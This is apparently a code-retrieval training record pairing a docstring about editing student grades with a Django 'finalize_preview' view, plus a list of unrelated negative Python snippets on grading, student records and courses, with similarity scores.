user F-measure): %0.6f' % avg_f_measure)\n str_output = '\\n'.join(output)\n print(str_output)\n logger.debug(str_output)", "def finalize(self):\n self.total_priors = np.sum(list(self.priors.values()))\n self.total_blocks = np.sum(list(self.nblocks.values()))\n self.total_fitness = np.sum(list(self.fitness.values()))\n self.blocks = BedTool.from_dataframe(self.df)", "def finalize(self):\n raise NotImplementedError('Must be implemented in subclasses.')", "def export(state, from_dir):\n\n grading_manager = GradingManager(state.get_assignment(), from_dir)\n state.grades = list(grade for grade in grading_manager.grades()\n if grade.graded())", "def finalize(self):\n for (phi_i, clsweights) in self.weights.iteritems():\n for (cls, weight) in clsweights.iteritems():\n weight.average(self.time)", "def do_finalize():\n\tdef _finalize(shutit):\n\t\t# Stop all the modules\n\t\tshutit.stop_all()\n\t\t# Finalize in reverse order\n\t\tshutit.log('PHASE: finalizing object ' + str(shutit), level=logging.DEBUG)\n\t\t# Login at least once to get the exports.\n\t\tfor module_id in shutit.module_ids(rev=True):\n\t\t\t# Only finalize if it's thought to be installed.\n\t\t\tif shutit.is_installed(shutit.shutit_map[module_id]):\n\t\t\t\tshutit.login(prompt_prefix=module_id,command=shutit_global.shutit_global_object.bash_startup_command,echo=False)\n\t\t\t\tif not shutit.shutit_map[module_id].finalize(shutit):\n\t\t\t\t\tshutit.fail(module_id + ' failed on finalize', shutit_pexpect_child=shutit.get_shutit_pexpect_session_from_id('target_child').pexpect_child) # pragma: no cover\n\t\t\t\tshutit.logout(echo=False)\n\t\tfor fshutit in shutit_global.shutit_global_object.shutit_objects:\n\t\t\t_finalize(fshutit)", "def print(self):\r\n self.print_avec_separateur()", "def __str__(self):\n return str(self.__student_name) + \" has grade \" + str(self.__grade_value) + \" at \" + str(self.__discipline_name)", "def finalize(self):\n self._db_obj.progress = self._db_obj.total\n self._db_obj.step = \"Complete\"\n self._db_obj.save()", "def conclusion():\n\n print('Program ends')" ]
[ "0.59876657", "0.57981944", "0.564417", "0.55673975", "0.55103207", "0.55028576", "0.5473704", "0.5460755", "0.5440873", "0.5409173", "0.53980476", "0.53825235", "0.5363283", "0.5363283", "0.5361439", "0.5361439", "0.5361439", "0.5361439", "0.5361439", "0.5361439", "0.53493667", "0.5339003", "0.5333089", "0.5324575", "0.53207976", "0.53089803", "0.52872986", "0.5278692", "0.52744025", "0.52744025", "0.5258739", "0.5258739", "0.5258739", "0.524245", "0.5235866", "0.52317953", "0.52265", "0.521021", "0.51947206", "0.5186745", "0.5182116", "0.5160306", "0.5149149", "0.5149149", "0.5139654", "0.51335347", "0.51210725", "0.51153135", "0.5104134", "0.5077344", "0.5075311", "0.5067085", "0.50563407", "0.5053425", "0.5039453", "0.5027204", "0.50263834", "0.5016588", "0.49890465", "0.4982327", "0.4979499", "0.49719533", "0.49704042", "0.4968685", "0.49673018", "0.49574807", "0.49509946", "0.4949447", "0.49425924", "0.493374", "0.49332815", "0.49230033", "0.4919448", "0.49132484", "0.49055716", "0.49011958", "0.48978043", "0.4895985", "0.48741275", "0.48720977", "0.48707616", "0.4870276", "0.4868955", "0.4845617", "0.4842831", "0.48428088", "0.4835685", "0.4827491", "0.48111808", "0.4809268", "0.48036283", "0.4802704", "0.48017222", "0.4793834", "0.47884807", "0.4781501", "0.47781157", "0.47766367", "0.47752693", "0.47736058" ]
0.5862954
1
Edit the grade for a category, as indexed by step, for each student as given by pk. Also edit the individual aspects of each grade category. For track heads and responsible staff.
def finalize_preview(request, pk, step=0):
    ts = get_timeslot()
    # The results menu must exist and be visible for the current timeslot.
    if not hasattr(ts, 'resultoptions') or not ts.resultoptions.Visible:
        raise PermissionDenied("Results menu is not yet visible.")
    dstr = get_object_or_404(Distribution, pk=pk)
    if not hasattr(dstr, 'presentationtimeslot'):
        raise PermissionDenied('This student does not have a presentation planned. Please plan it first.')

    # Only superusers, the track head, the responsible staff member, support staff
    # (group type 3), and the assessors of this presentation may view the preview.
    if not request.user.is_superuser and \
            request.user != dstr.Proposal.Track.Head and \
            request.user != dstr.Proposal.ResponsibleStaff and \
            get_grouptype('3') not in request.user.groups.all() and \
            request.user not in dstr.presentationtimeslot.Presentations.Assessors.all():
        raise PermissionDenied("You do not have the correct permissions to view print preview.")
    results = dstr.results.all()
    return render(request, "results/finalize_grades.html", {
        "dstr": dstr,
        "catresults": results,
        # Grades are final only if every category result is marked Final.
        "final": all(f.Final is True for f in results) if results else False,
        "finalgrade": dstr.TotalGradeRounded(),
        "preview": True,
    })
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update_course_enrollment(self, student_id, course_id, course_section_id, term):\n conn = sqlite3.connect(self.db_path)\n cursor = conn.cursor()\n try:\n with conn:\n cursor.execute(\n \"\"\"\n UPDATE course_enrollments\n SET course_id = ?, course_section_id = ?\n WHERE student_id = ?\n (?,?,?)\"\"\",\n (course_id, course_section_id, student_id),\n )\n return 1\n except sqlite3.IntegrityError:\n return -1", "def edit_grade(self, username: str, token: str, course_abbreviation: str, student_id: str, updated_grade: float) -> bool:\n\n # Validate user first\n if not self.validate(username=username, token=token, check_privilege='instructor'):\n raise RuntimeError(\"User not verified!\")\n\n # Get the student's UID\n student_uid = self.get_uid(username=student_id)\n\n # Get a DB cursor\n cursor = self._db_connection.cursor()\n\n # Get the course ID from the abbreviation\n cursor.execute('''\n SELECT course_id FROM courses WHERE course_abbreviation LIKE ?;\n ''', (course_abbreviation,))\n db_result = cursor.fetchone()\n\n # If no associated courses are found\n if db_result is None:\n RuntimeError(f\"Could not find course associated with: {course_abbreviation}\")\n\n # Extract the course ID from the returned tuple\n course_id = db_result[0]\n\n # Run update in the DB\n cursor.execute('''\n UPDATE enrollment_records SET grade = ? WHERE uid = ? AND course_id = ?\n ''', (updated_grade, student_uid, course_id))\n self._db_connection.commit()\n\n return True", "def update_grade(self, course, grade):\n if course not in self.courses:\n raise NameError('This student is not enrolled in that course')\n else:\n self.courses[course] = grade\n\n return self", "def eval_evalassignment(request, pk, pts):\n student = request.user.student\n evalassignment = Evalassignment.objects.\\\n filter(pk=pk, assignment__student=student).first()\n if evalassignment:\n evalassignment.grade_evaluation = pts\n evalassignment.save()\n redirect_item = '#assignment%s' % evalassignment.assignment.id\n else:\n redirect_item = ''\n return redirect('/dashboard_student/' + redirect_item)", "def edit_course(self, course):\n EDIT_COURSE = \"\"\"UPDATE Course SET subject_code = %s, credit_hours = %s, description = %s WHERE name = %s\"\"\"\n\n self.db_cursor.execute(EDIT_COURSE, (\n course.subject_code, course.credit_hours, course.description, course.name))\n self.db_connection.commit()\n\n DELETE_COURSE_TOPICS = \"\"\"DELETE FROM CourseTopics WHERE course_name = %s\"\"\"\n self.db_cursor.execute(DELETE_COURSE_TOPICS, (course.name,))\n self.db_connection.commit()\n INSERT_COURSE_TOPICS = \"\"\"INSERT INTO CourseTopics (course_name, topic_id) VALUES (%s, %s)\"\"\"\n for ct in course.topics:\n self.db_cursor.execute(INSERT_COURSE_TOPICS, (course.name,ct))\n self.db_connection.commit()\n\n DELETE_COURSE_GOALS = \"\"\"DELETE FROM CourseGoals WHERE course_name = %s\"\"\"\n self.db_cursor.execute(DELETE_COURSE_GOALS, (course.name,))\n self.db_connection.commit()\n INSERT_COURSE_GOALS = \"\"\"INSERT INTO CourseGoals (course_name, goal_id) VALUES (%s, %s)\"\"\"\n for cg in course.goals:\n self.db_cursor.execute(INSERT_COURSE_GOALS, (course.name, cg))\n self.db_connection.commit()", "def update_subcategory(self, control_type, *args):\n\n\t\tif control_type is 'intField':\n\t\t\tself.log('query intField and update others')\n\t\t\tintField_value = cmds.intField(self.grade_intField, query = True, value = True)\n\t\t\tself.log('intField is %s' % intField_value)\n\n\t\t\tself.current_grade_value = intField_value\n\t\t\tself.log('current grade is: 
%s' % self.current_grade_value)\n\t\t\tcmds.intSlider(self.grade_slider, edit=True, value = -intField_value)\n\t\t\tself.update_radios_default_comments(intField_value)\n\t\t\tself.update_default_comments()\n\t\t\tself.update_is_complete()\n\t\t\tself.updateFunction()\n\n\t\telif control_type is 'slider':\n\n\t\t\tself.log('query slider and update others')\n\t\t\tslider_value = abs(cmds.intSlider(self.grade_slider, query = True, value = True))\n\t\t\tself.log('intSlider is %s' % slider_value)\n\n\t\t\tself.current_grade_value = slider_value\n\t\t\tself.log('current grade is: %s' % self.current_grade_value)\n\t\t\tcmds.intField(self.grade_intField, edit = True, value = slider_value)\n\t\t\tself.update_radios_default_comments(slider_value)\n\t\t\tself.update_default_comments()\n\t\t\tself.update_is_complete()\n\t\t\tself.updateFunction()\n\n\t\telif control_type is 'radioButton':\n\t\t\tself.log('query radio collection and update others')\n\t\t\tselected = cmds.radioCollection(self.grade_radio_collection, query = True, select = True)\n\t\t\tselected_letter = cmds.radioButton(selected, query = True, label = True)\n\t\t\tselected_letter = re.sub('\\\\+', 'plus', selected_letter)\n\t\t\tself.log('selected radioButton: %s' % selected_letter)\n\n\t\t\tself.current_grade_value = int(self.grade_values.find(selected_letter).text)\n\t\t\tself.log('current grade is: %s' % self.current_grade_value)\n\t\t\tcmds.intField(self.grade_intField, edit = True, value = self.current_grade_value)\n\t\t\tcmds.intSlider(self.grade_slider, edit = True, value = -self.current_grade_value)\n\t\t\tself.log('selected_letter: %s' % selected_letter)\n\t\t\t\n\t\t\tcmds.scrollField(self.default_comments, edit = True, text = self.subcatXML.find('gradeComment').find(selected_letter).text)\n\t\t\tself.current_default_comment_text = cmds.scrollField(self.default_comments, query = True, text = True)\n\t\t\tself.log('Default Comments Updated')\n\t\t\tself.log(self.current_default_comment_text)\n\t\t\tself.update_is_complete()\n\t\t\tself.updateFunction()\n\n\t\telif control_type is 'default_comments_text':\n\t\t\tself.current_default_comment_text = cmds.scrollField(self.default_comments, query = True, text = True)\n\t\t\tself.log('Default Comments Updated')\n\t\t\tself.log(self.current_default_comment_text)\n\t\t\tself.update_is_complete()\n\n\t\telif control_type is 'example_comments_text':\n\t\t\tself.current_example_comment_text = cmds.scrollField(self.example_comments, query = True, text = True)\n\t\t\tself.log('examples updated')\n\t\t\tself.log(self.current_example_comment_text)\n\n\t\telse:\n\t\t\tself.current_comment_text = cmds.scrollField(self.comments_text_field, query = True, text = True)\n\t\t\tself.log('comments updated')\n\t\t\tself.log(self.current_comment_text)", "def modify_assignmentype(request, pk):\n prof = request.user.prof\n assignmentype = Assignmentype.objects.filter(id=pk, prof=prof).first()\n if assignmentype:\n if request.method == 'POST':\n form = LightAssignmentypeForm(request.POST, instance=assignmentype)\n if form.is_valid():\n form.save()\n return redirect('/detail_assignmentype/%s/' % assignmentype.pk)\n else:\n form = LightAssignmentypeForm(instance=assignmentype)\n context = {}\n context['assignmentype_id'] = assignmentype.id\n context['message'] = 'Modify details of your assignment '\\\n '(keep current student list)'\n context['form'] = form\n context['type_post'] = 'modify'\n return render(request, 'gradapp/assignmentype_form.html', context)\n else:\n return redirect('gradapp:index')", "def 
edit_student(request, student_id):\n\n\temp = models.Teacher.objects.get(user=request.user)\n\tif not emp.student_permit:\n\t\traise Http404\n\tstudent = models.Student.objects.filter(\n\t\tpk=student_id, soft_delete=False\n\t).first()\n\tif not student:\n\t\traise Http404\n\tcontext_dict = {\n\t\t\"all_courses\": context_helper.course_helper(),\n\t\t\"blood_groups\": context_helper.blood_group_helper(),\n\t\t\"guardian_types\": context_helper.guardian_type_helper(),\n\t\t\"gender_types\": context_helper.gender_helper(),\n\t\t'student_id': student_id\n\t}\n\tif request.method == 'POST':\n\t\tupdate_fields = []\n\t\tactivity = ''\n\t\tsname = request.POST.get('sname')\n\t\troll = request.POST.get('rno')\n\t\tdob = request.POST.get('dob')\n\t\tgender = request.POST.get('gender_picker')\n\t\tbgroup = request.POST.get('blood_group_picker')\n\t\tif bgroup == 'Choose option':\n\t\t\tbgroup = None\n\t\tphone = request.POST.get('phone')\n\t\tcurradd = request.POST.get('curradd')\n\t\tpermadd = request.POST.get('permadd')\n\t\tgname = request.POST.get('gname')\n\t\tcourse = request.POST.get('course_picker')\n\t\tbatch = request.POST.get('batch')\n\t\tgtype = request.POST.get('guardian_type_picker')\n\t\tgphone = request.POST.get('gphone')\n\t\temail = request.POST.get('email')\n\t\taddress_flag = request.POST.get('address_flag')\n\t\tprint (address_flag)\n\t\taddress_flag = True if address_flag == 'on' else False\n\t\tif address_flag == True:\n\t\t\tpermadd = curradd\n\t\ttry:\n\t\t\tif \"profile-img\" in request.FILES:\n\t\t\t\tstudent.photo = request.FILES[\"profile-img\"]\n\t\t\t\tupdate_fields.append('photo')\n\t\t\t\tactivity += 'Changed photo.\\n'\n\t\t\tif student.name != sname:\n\t\t\t\tstudent.name = sname\n\t\t\t\tupdate_fields.append('name')\n\t\t\t\tactivity += 'Changed name to '+ str(sname) +'.\\n'\n\t\t\tif student.roll_no != roll:\n\t\t\t\tstudent.roll_no = roll\n\t\t\t\tupdate_fields.append('roll_no')\n\t\t\t\tactivity += 'Changed roll number to '+ str(roll) +'.\\n'\n\t\t\tif str(student.dob) != str(dob):\n\t\t\t\tstudent.dob = dob\n\t\t\t\tupdate_fields.append('dob')\n\t\t\t\tactivity += 'Changed DOB to ' + str(dob) + '.\\n'\n\t\t\tif student.gender != gender:\n\t\t\t\tstudent.gender = gender\n\t\t\t\tupdate_fields.append('gender')\n\t\t\t\tactivity += 'Changed gender to ' + str(gender) + '.\\n'\n\t\t\tif student.blood_group != bgroup:\n\t\t\t\tstudent.blood_group = bgroup\n\t\t\t\tupdate_fields.append('blood_group')\n\t\t\t\tactivity += 'Changed blood group to ' + str(bgroup) + '.\\n'\n\t\t\tif student.phone != phone:\n\t\t\t\tstudent.phone = phone\n\t\t\t\tupdate_fields.append('phone')\n\t\t\t\tactivity += 'Changed phone number to ' + str(phone) + '.\\n'\n\t\t\tif student.curr_address != curradd:\n\t\t\t\tstudent.curr_address = curradd\n\t\t\t\tupdate_fields.append('curr_address')\n\t\t\t\tactivity += 'Changed current address to ' + str(curradd) + '.\\n'\n\t\t\tif student.perm_address != permadd:\n\t\t\t\tstudent.perm_address = permadd\n\t\t\t\tupdate_fields.append('perm_address')\n\t\t\t\tactivity += 'Changed permanent address to ' + str(permadd) + '.\\n'\n\t\t\tif student.curr_address != curradd:\n\t\t\t\tstudent.curr_address = curradd\n\t\t\t\tupdate_fields.append('curr_address')\n\t\t\t\tactivity += 'Changed current address to ' + str(curradd) + '.\\n'\n\t\t\tif student.guardian_name != gname:\n\t\t\t\tstudent.guardian_name = gname\n\t\t\t\tupdate_fields.append('guardian_name')\n\t\t\t\tactivity += 'Changed current address to ' + str(gname) + '.\\n'\n\t\t\tif 
student.guardian_phone != gphone:\n\t\t\t\tstudent.guardian_phone = gphone\n\t\t\t\tupdate_fields.append('guardian_phone')\n\t\t\t\tactivity += 'Changed guardian phone to ' + str(gphone) + '.\\n'\n\t\t\tif student.guardian_type != gtype:\n\t\t\t\tstudent.guardian_type = gtype\n\t\t\t\tupdate_fields.append('guardian_type')\n\t\t\t\tactivity += 'Changed current address to ' + str(gtype) + '.\\n'\n\t\t\tif str(student.course.pk) != str(course):\n\t\t\t\tstudent.course = models.Course.objects.get(pk=course)\n\t\t\t\tupdate_fields.append('course')\n\t\t\t\tactivity += 'Changed course to ' + str(course) + '.\\n'\n\t\t\tif student.batch != batch:\n\t\t\t\tstudent.batch = batch\n\t\t\t\tupdate_fields.append('batch')\n\t\t\t\tactivity += 'Changed batch to' + str(batch) + '.\\n'\n\t\t\tif student.email != email:\n\t\t\t\tstudent.email = email\n\t\t\t\tupdate_fields.append('email')\n\t\t\t\tactivity += 'Changed email to ' + str(email) + '.\\n'\n\t\t\tif student.address_flag != address_flag:\n\t\t\t\tstudent.address_flag = address_flag\n\t\t\t\tupdate_fields.append('address_flag')\n\t\t\t\tactivity += 'Changed address flag.'\n\t\t\tstudent.save(update_fields=update_fields)\n\t\t\thistory = models.History(\n\t\t\t\tuser=emp,\n\t\t\t\tactivity=activity,\n\t\t\t\tactivity_type=\"edit student\"\n\t\t\t)\n\t\t\thistory.save()\n\t\t\tcontext_dict[\"message\"] = 'Successfully updated student.'\n\t\t\tcontext_dict[\"success\"] = True\n\t\texcept Exception as e:\n\t\t\tcontext_dict[\"message\"] = str(e)\n\t\t\tcontext_dict[\"success\"] = False\n\t\t\tprint(e)\n\tcontext_dict.update(context_helper.get_student_info(student))\n\tif type(context_dict['dob']) == str:\n\t\tcontext_dict['dob'] = datetime.strptime(context_dict['dob'], '%Y-%m-%d')\n\tfor i in context_dict['course']:\n\t\ttry: del context_dict['all_courses'][i]\n\t\texcept: pass\n\tfor i in context_dict['blood_group']:\n\t\ttry: context_dict['blood_groups'].remove(i)\n\t\texcept: pass\n\tfor i in context_dict['guardian_type']:\n\t\ttry: context_dict['guardian_types'].remove(i)\n\t\texcept: pass\n\tfor i in context_dict['gender_type']:\n\t\ttry: context_dict['gender_types'].remove(i)\n\t\texcept: pass\n\tif context_dict.get('success', False):\n\t\treturn HttpResponseRedirect('/view-students')\n\treturn render(\n\t\trequest, \"editStudent.html\", context_dict\n\t)", "def __ui_grade_student(self):\n student_id = input(\"Give student ID: \")\n discipline_name = input(\"Give discipline discipline_name: \")\n\n try:\n grade_value = input(\"Give grade: \")\n if not self.__student_controller.student_has_discipline(student_id, discipline_name):\n print(\"The student isn't enrolled at the given discipline!\")\n return\n self.__grade_controller.add_grade(\n student_id,\n self.__discipline_controller.get_id_by_name(discipline_name),\n grade_value\n )\n print(\"Grade successful! 
\\n\")\n\n except GradeException as ge:\n print(ge)\n return\n except StudentException as se:\n print(se)\n return\n except RepositoryException as re:\n print(re)\n return\n except ValueError as ve:\n print(ve)\n return", "def add_grades(self, request, pk=None):\n\n instance = self.get_object()\n try:\n user = self.request.user\n query = models.StudentSubject.objects.filter(\n subject__teacher__user=user,\n subject=instance\n )\n serializer = self.get_serializer(query, many=True)\n \n id = self.request.query_params.get('id')\n\n if id:\n q = get_object_or_404(\n models.StudentSubject,\n pk=id,\n subject=instance\n )\n return self.filtering(request, q)\n return Response(serializer.data)\n except:\n raise except_handler.ActionDecor()", "def modify_an_entry(self):\n target_list = self.find_student()\n\n if not len(target_list):\n print('There is no contents to show')\n else:\n opt = self.input_options(['midterm', 'finalterm'], 1, 'Which test do you want to modify?')\n score = self.input_score()\n\n if opt.upper() == 'MIDTERM':\n for idx in target_list.index:\n self.student_list.loc[self.student_list.index == idx, 'midterm'] = score\n else:\n for idx in target_list.index:\n self.student_list.loc[self.student_list.index == idx, 'finalterm'] = score", "def insert_question_assignmentype(request, pk, cd):\n prof = request.user.prof\n assignmentype = Assignmentype.objects.filter(id=pk, prof=prof).first()\n cd = int(cd)\n if cd == 1:\n classForm = AddQuestionForm\n info = 'Add'\n elif cd == -1:\n classForm = RemoveQuestionForm\n info = 'Remove'\n if assignmentype:\n if request.method == 'POST':\n form = classForm(request.POST,\n nb_questions=assignmentype.nb_questions)\n if form.is_valid():\n question = form.cleaned_data['question']\n # Modify attribute question of all associated evalquestion\n if cd == -1:\n evalquestions = Evalquestion.objects.filter(\n evalassignment__assignment__assignmentype=assignmentype,\n question=question)\n evalquestions.delete()\n evalquestions = Evalquestion.objects.filter(\n evalassignment__assignment__assignmentype=assignmentype,\n question__gte=question)\n evalquestions.update(question=F('question') + cd)\n # Create a new evalquestion for each evalassignment (if cd=1)\n # and inform that it has to be graded\n for evalassignment in Evalassignment.objects.filter(\n assignment__assignmentype=assignmentype):\n if cd == 1:\n Evalquestion.objects.create(\n evalassignment=evalassignment, question=question)\n evalassignment.reset_grade()\n elif cd == -1:\n evalassignment.grade_assignment = None\n evalassignment.save()\n # Add a question to the assignmentype\n assignmentype.nb_questions += cd\n if cd == 1:\n if assignmentype.questions_coeff:\n assignmentype.questions_coeff.insert(question - 1, None)\n if assignmentype.questions_statement:\n assignmentype.questions_statement.insert(question - 1,\n None)\n assignmentype.save()\n elif cd == -1:\n if assignmentype.questions_coeff:\n del assignmentype.questions_coeff[question - 1]\n if assignmentype.questions_statement:\n del assignmentype.questions_statement[question - 1]\n assignmentype.save()\n log = tasks.compute_grades_assignmentype(assignmentype.pk)\n logger.info(log)\n return redirect('/detail_assignmentype/%s/' % assignmentype.pk)\n form = classForm(nb_questions=assignmentype.nb_questions)\n context = {'assignmentype': assignmentype, 'form': form, 'info': info,\n 'cd': cd}\n return render(request, 'gradapp/insert_question.html', context)\n else:\n return redirect('gradapp:index')", "def edit(self, **kwargs):\n ...", "def 
save_grade(request, course_id):\r\n\r\n course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)\r\n _check_access(request.user, course_key)\r\n\r\n if request.method != 'POST':\r\n raise Http404\r\n p = request.POST\r\n required = set(['score', 'feedback', 'submission_id', 'location', 'submission_flagged'])\r\n skipped = 'skipped' in p\r\n #If the instructor has skipped grading the submission, then there will not be any rubric scores.\r\n #Only add in the rubric scores if the instructor has not skipped.\r\n if not skipped:\r\n required.add('rubric_scores[]')\r\n actual = set(p.keys())\r\n missing = required - actual\r\n if len(missing) > 0:\r\n return _err_response('Missing required keys {0}'.format(\r\n ', '.join(missing)))\r\n\r\n success, message = check_feedback_length(p)\r\n if not success:\r\n return _err_response(message)\r\n\r\n grader_id = unique_id_for_user(request.user)\r\n\r\n location = course_key.make_usage_key_from_deprecated_string(p['location'])\r\n\r\n try:\r\n result = staff_grading_service().save_grade(course_key,\r\n grader_id,\r\n p['submission_id'],\r\n p['score'],\r\n p['feedback'],\r\n skipped,\r\n p.getlist('rubric_scores[]'),\r\n p['submission_flagged'])\r\n except GradingServiceError:\r\n #This is a dev_facing_error\r\n log.exception(\r\n \"Error saving grade in the staff grading interface in open ended grading. Request: {0} Course ID: {1}\".format(\r\n request, course_id))\r\n #This is a staff_facing_error\r\n return _err_response(STAFF_ERROR_MESSAGE)\r\n except ValueError:\r\n #This is a dev_facing_error\r\n log.exception(\r\n \"save_grade returned broken json in the staff grading interface in open ended grading: {0}\".format(\r\n result_json))\r\n #This is a staff_facing_error\r\n return _err_response(STAFF_ERROR_MESSAGE)\r\n\r\n if not result.get('success', False):\r\n #This is a dev_facing_error\r\n log.warning(\r\n 'Got success=False from staff grading service in open ended grading. Response: {0}'.format(result_json))\r\n return _err_response(STAFF_ERROR_MESSAGE)\r\n\r\n # Ok, save_grade seemed to work. 
Get the next submission to grade.\r\n return HttpResponse(json.dumps(_get_next(course_id, grader_id, location)),\r\n mimetype=\"application/json\")", "def edit_subject(request,subject_id):\n\n\temp = models.Teacher.objects.get(user=request.user)\n\tif not emp.subject_permit:\n\t\traise Http404\n\tsubject = models.Subject.objects.filter(\n\t\tpk=subject_id, soft_delete=False\n\t).first()\n\tif not subject:\n\t\traise Http404\n\tcontext_dict = {\n\t\t\"all_courses\": context_helper.course_helper(),\n\t\t\"subject_types\": context_helper.subject_type_helper(),\n\t\t'subject_id': subject_id,\n\t}\n\tif request.method == 'POST':\n\t\tupdate_fields = []\n\t\tactivity = ''\n\t\tcourse = request.POST.get('course_picker')\n\t\tname = request.POST.get('sname')\n\t\tsid = request.POST.get('sid')\n\t\tstype = request.POST.get('subject_picker')\n\t\tmaxmarks = request.POST.get('marks')\n\t\ttry:\n\t\t\tif str(subject.course.pk) != str(course):\n\t\t\t\tsubject.course = models.Course.objects.get(pk=course)\n\t\t\t\tupdate_fields.append('course')\n\t\t\t\tactivity += 'Changed course to ' + str(course) + '.\\n'\n\t\t\tif subject.s_type != stype:\n\t\t\t\tsubject.s_type = stype\n\t\t\t\tupdate_fields.append('s_type')\n\t\t\t\tactivity += 'Changed subject type to ' + str(stype) + '.\\n'\n\t\t\tif subject.name != name:\n\t\t\t\tsubject.name = name\n\t\t\t\tupdate_fields.append('name')\n\t\t\t\tactivity += 'Changed subject name to' + str(name) + '.\\n'\n\t\t\tif subject.s_id != sid:\n\t\t\t\tsubject.s_id = sid\n\t\t\t\tupdate_fields.append('s_id')\n\t\t\t\tactivity += 'Changed subject ID to' + str(sid) + '.\\n'\n\t\t\tif subject.max_marks != maxmarks:\n\t\t\t\tsubject.max_marks = maxmarks\n\t\t\t\tupdate_fields.append('max_marks')\n\t\t\t\tactivity += 'Changed maximum marks to' + str(maxmarks) + '.\\n'\n\t\t\tsubject.save(update_fields=update_fields)\n\t\t\thistory = models.History(\n\t\t\t\tuser=emp,\n\t\t\t\tactivity=activity,\n\t\t\t\tactivity_type=\"edit subject\"\n\t\t\t)\n\t\t\thistory.save()\n\t\t\tcontext_dict[\"message\"] = 'Successfully updated Result Data.'\n\t\t\tcontext_dict[\"success\"] = True\n\t\texcept Exception as e:\n\t\t\tcontext_dict[\"message\"] = str(e)\n\t\t\tcontext_dict[\"success\"] = False\n\t\t\tprint(e)\n\tcontext_dict.update(context_helper.get_subject_info(subject))\n\tfor i in context_dict['courses']:\n\t\ttry: del context_dict['all_courses'][i]\n\t\texcept: pass\n\tfor i in context_dict['subject_type']:\n\t\ttry: context_dict['subject_types'].remove(i)\n\t\texcept: pass\n\tif context_dict.get('success', False):\n\t\treturn HttpResponseRedirect('/view-subjects')\n\treturn render(\n\t\trequest, \"editSubject.html\", context_dict\n\t)", "def edit_person(self, pk):", "def _grade(student, request, course, keep_raw_scores):\r\n grading_context = course.grading_context\r\n raw_scores = []\r\n\r\n # Dict of item_ids -> (earned, possible) point tuples. 
This *only* grabs\r\n # scores that were registered with the submissions API, which for the moment\r\n # means only openassessment (edx-ora2)\r\n submissions_scores = sub_api.get_scores(\r\n course.id.to_deprecated_string(), anonymous_id_for_user(student, course.id)\r\n )\r\n\r\n totaled_scores = {}\r\n # This next complicated loop is just to collect the totaled_scores, which is\r\n # passed to the grader\r\n for section_format, sections in grading_context['graded_sections'].iteritems():\r\n format_scores = []\r\n for section in sections:\r\n section_descriptor = section['section_descriptor']\r\n section_name = section_descriptor.display_name_with_default\r\n\r\n # some problems have state that is updated independently of interaction\r\n # with the LMS, so they need to always be scored. (E.g. foldit.,\r\n # combinedopenended)\r\n should_grade_section = any(\r\n descriptor.always_recalculate_grades for descriptor in section['xmoduledescriptors']\r\n )\r\n\r\n # If there are no problems that always have to be regraded, check to\r\n # see if any of our locations are in the scores from the submissions\r\n # API. If scores exist, we have to calculate grades for this section.\r\n if not should_grade_section:\r\n should_grade_section = any(\r\n descriptor.location.to_deprecated_string() in submissions_scores\r\n for descriptor in section['xmoduledescriptors']\r\n )\r\n\r\n if not should_grade_section:\r\n with manual_transaction():\r\n should_grade_section = StudentModule.objects.filter(\r\n student=student,\r\n module_state_key__in=[\r\n descriptor.location for descriptor in section['xmoduledescriptors']\r\n ]\r\n ).exists()\r\n\r\n # If we haven't seen a single problem in the section, we don't have\r\n # to grade it at all! We can assume 0%\r\n if should_grade_section:\r\n scores = []\r\n\r\n def create_module(descriptor):\r\n '''creates an XModule instance given a descriptor'''\r\n # TODO: We need the request to pass into here. If we could forego that, our arguments\r\n # would be simpler\r\n with manual_transaction():\r\n field_data_cache = FieldDataCache([descriptor], course.id, student)\r\n return get_module_for_descriptor(student, request, descriptor, field_data_cache, course.id)\r\n\r\n for module_descriptor in yield_dynamic_descriptor_descendents(section_descriptor, create_module):\r\n\r\n (correct, total) = get_score(\r\n course.id, student, module_descriptor, create_module, scores_cache=submissions_scores\r\n )\r\n if correct is None and total is None:\r\n continue\r\n\r\n if settings.GENERATE_PROFILE_SCORES: \t# for debugging!\r\n if total > 1:\r\n correct = random.randrange(max(total - 2, 1), total + 1)\r\n else:\r\n correct = total\r\n\r\n graded = module_descriptor.graded\r\n if not total > 0:\r\n #We simply cannot grade a problem that is 12/0, because we might need it as a percentage\r\n graded = False\r\n\r\n scores.append(Score(correct, total, graded, module_descriptor.display_name_with_default))\r\n\r\n _, graded_total = graders.aggregate_scores(scores, section_name)\r\n if keep_raw_scores:\r\n raw_scores += scores\r\n else:\r\n graded_total = Score(0.0, 1.0, True, section_name)\r\n\r\n #Add the graded total to totaled_scores\r\n if graded_total.possible > 0:\r\n format_scores.append(graded_total)\r\n else:\r\n log.exception(\"Unable to grade a section with a total possible score of zero. 
\" +\r\n str(section_descriptor.location))\r\n\r\n totaled_scores[section_format] = format_scores\r\n\r\n grade_summary = course.grader.grade(totaled_scores, generate_random_scores=settings.GENERATE_PROFILE_SCORES)\r\n\r\n # We round the grade here, to make sure that the grade is an whole percentage and\r\n # doesn't get displayed differently than it gets grades\r\n grade_summary['percent'] = round(grade_summary['percent'] * 100 + 0.05) / 100\r\n\r\n letter_grade = grade_for_percentage(course.grade_cutoffs, grade_summary['percent'])\r\n grade_summary['grade'] = letter_grade\r\n grade_summary['totaled_scores'] = totaled_scores \t# make this available, eg for instructor download & debugging\r\n if keep_raw_scores:\r\n grade_summary['raw_scores'] = raw_scores # way to get all RAW scores out to instructor\r\n # so grader can be double-checked\r\n return grade_summary", "def editDetail(id):\n form = EditDetailForm(request.form)\n if request.method == \"GET\":\n return render_template(\"/pages/edit.html\", form=form)\n else:\n choose = True\n section = form.category.data\n return redirect(url_for(\"editDetailSection\", id=id ,section=section))", "def edit_attendance(request, attendance_id):\n\n\temp = models.Teacher.objects.get(user=request.user)\n\tif not emp.student_permit:\n\t\traise Http404\n\tattendance = models.Attendance.objects.filter(\n\t\tpk=attendance_id, soft_delete=False\n\t).first()\n\tprint(\"1\")\n\tcontext_dict = {\n\t\t\"all_subjects\": context_helper.subject_helper(),\n\t\t'attendance_id': attendance_id,\n\t}\n\tif request.method == 'POST':\n\t\tupdate_fields = []\n\t\tactivity = ''\n\t\troll = request.POST.get('roll')\n\t\tsubject = request.POST.get('subject_picker')\n\t\tobtained = request.POST.get('attendance')\n\t\ttotal = request.POST.get('total')\n\t\tstudent = models.Student.objects.filter(\n\t\t\troll_no=roll\n\t\t).first()\n\t\tif not student:\n\t\t\tcontext_dict[\"message\"] = 'Student at does not exist / Roll number has not been 